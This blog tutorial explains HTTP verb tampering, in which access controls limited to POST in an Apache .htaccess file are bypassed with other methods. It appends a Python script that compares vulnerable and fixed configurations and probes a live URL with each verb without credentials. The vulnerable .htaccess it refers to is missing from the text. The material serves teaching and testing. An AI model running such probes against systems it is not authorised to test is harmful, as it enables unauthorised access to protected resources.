Saturday, May 20, 2017


HTTP Verb Tampering Demo/Example/Tutorial



What is an HTTP Verb?
  • According to Wikipedia, "The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web."

  • A verb is simply an HTTP method; it indicates the action the client wants performed on the identified resource.


-  List of some basic HTTP verbs (methods)
  • OPTIONS
  • GET
  • HEAD
  • POST 
  • PUT
  • DELETE
  • TRACE
  • CONNECT



What is HTTP Verb Tampering?

It is a way to bypass an access control by changing the HTTP verb of the request. A common case: a private directory is protected with HTTP Basic authentication through an Apache .htaccess file, but the protection is written so that it only applies to one method. The weakness is not in Basic authentication itself; it is an Apache .htaccess misconfiguration, and it is easy to exploit.

Here the administrator has limited access to the private resource or directory only for the POST request method, by wrapping the authentication directive in a <Limit POST> block. See the vulnerable .htaccess below.














Here AuthUserFile is the path to the .htpasswd file, which stores the usernames and the password hashes (hashed, not encrypted: the server cannot recover the plaintext from it).


require valid-user
 


This applies the check only to the POST method: a POST must carry credentials that match an entry in the .htpasswd file; if they are missing or wrong, the 401 error page shows up.


Here the administrator has limited the POST method, but what about the other methods? They are not restricted at all. This means a request for the same resource sent with any other method (GET, HEAD, or even an arbitrary made-up verb, which many server-side handlers process like a GET) reaches the protected private resource or directory without any credentials. Below I have provided a video DEMO of successful exploitation of an HTTP Verb Tampering vulnerability via Live HTTP Headers (Firefox add-on) on an AT&T sub domain (reported & fixed). In the next post I will show various ways to fix or patch this vulnerability.
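The bypass described above, as an added example that is not part of the original post. It models the Apache <Limit>/<LimitExcept> method-matching rule in a few lines so the vulnerable and the fixed .htaccess can be compared offline, and it includes a small prober that sends each verb to a live URL without credentials. Both .htaccess texts and the path /var/www/private/.htpasswd are constructed for illustration; the evaluator is a toy model of the one rule that matters here, not Apache's own configuration parser.

```python
"""Toy model of the Apache <Limit>/<LimitExcept> rule, plus a live prober.

Added example, not code from the original post. The two .htaccess texts and
the path /var/www/private/.htpasswd are constructed for illustration; the
evaluator models only the method-matching rule that matters here.
"""
import http.client
import re
import sys
from urllib.parse import urlsplit

# Constructed vulnerable config: Require is wrapped in <Limit POST>, so the
# credential check runs for POST only.
VULNERABLE_HTACCESS = """\
AuthType Basic
AuthName "Private area"
AuthUserFile /var/www/private/.htpasswd
<Limit POST>
  Require valid-user
</Limit>
"""

# Constructed fixed config: same directives with the <Limit> wrapper removed,
# so the credential check applies to every method, known or not.
FIXED_HTACCESS = """\
AuthType Basic
AuthName "Private area"
AuthUserFile /var/www/private/.htpasswd
Require valid-user
"""

PROBE_METHODS = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "FOO"]

_BLOCK_RE = re.compile(r"<(Limit|LimitExcept)\s+([^>]+)>(.*?)</\1>",
                       re.IGNORECASE | re.DOTALL)
_AUTH_RE = re.compile(r"^\s*Require\s+(valid-user|user|group)\b",
                      re.IGNORECASE | re.MULTILINE)


def requires_auth(htaccess: str, method: str) -> bool:
    """True if a credential-requiring Require directive applies to `method`.

    <Limit A B> applies its body to the listed methods only; <LimitExcept A B>
    to every method except the listed ones; a directive outside either block
    applies to all methods. As in Apache, listing GET also covers HEAD.
    """
    method = method.upper()
    for m in _BLOCK_RE.finditer(htaccess):
        kind, listed, body = m.group(1).lower(), m.group(2).split(), m.group(3)
        if not _AUTH_RE.search(body):
            continue
        listed = {x.upper() for x in listed}
        if "GET" in listed:
            listed.add("HEAD")
        covered = method in listed
        if kind == "limitexcept":
            covered = not covered
        if covered:
            return True
    outside = _BLOCK_RE.sub("", htaccess)
    return bool(_AUTH_RE.search(outside))


def bypass_methods(htaccess: str, methods=PROBE_METHODS) -> list:
    """Methods that reach the resource with no credentials at all."""
    return [m for m in methods if not requires_auth(htaccess, m)]


def probe_url(url: str, methods=PROBE_METHODS, timeout: float = 5.0) -> dict:
    """Send each method to `url` with no credentials; return {method: status}.

    On a target that answers 401 to POST, any other method answering 200 is a
    verb-tampering bypass. "FOO" is deliberately not a real method: many
    server-side handlers process an unknown verb like a GET.
    """
    parts = urlsplit(url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    results = {}
    for method in methods:
        conn = conn_cls(parts.netloc, timeout=timeout)
        try:
            conn.request(method, parts.path or "/")
            results[method] = conn.getresponse().status
        except OSError as exc:
            results[method] = f"error: {exc}"
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    print("vulnerable config, unauthenticated methods:",
          bypass_methods(VULNERABLE_HTACCESS))
    print("fixed config, unauthenticated methods:",
          bypass_methods(FIXED_HTACCESS))
    if len(sys.argv) > 1:  # e.g. python verb_tamper.py https://host/private/
        for method, status in probe_url(sys.argv[1]).items():
            print(f"{method:8} -> {status}")
```

With the vulnerable text, every method except POST is reported as unauthenticated; with the fixed text the list is empty, because the Require directive sits outside any <Limit> block and therefore applies to whatever verb the client sends. When run against a real URL, compare the status of POST (expected 401) with the status of the other verbs; a 200 on GET, HEAD or FOO is the bypass the post demonstrates.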


Reviewed by Rishal Dwivedi on Sep 21 2014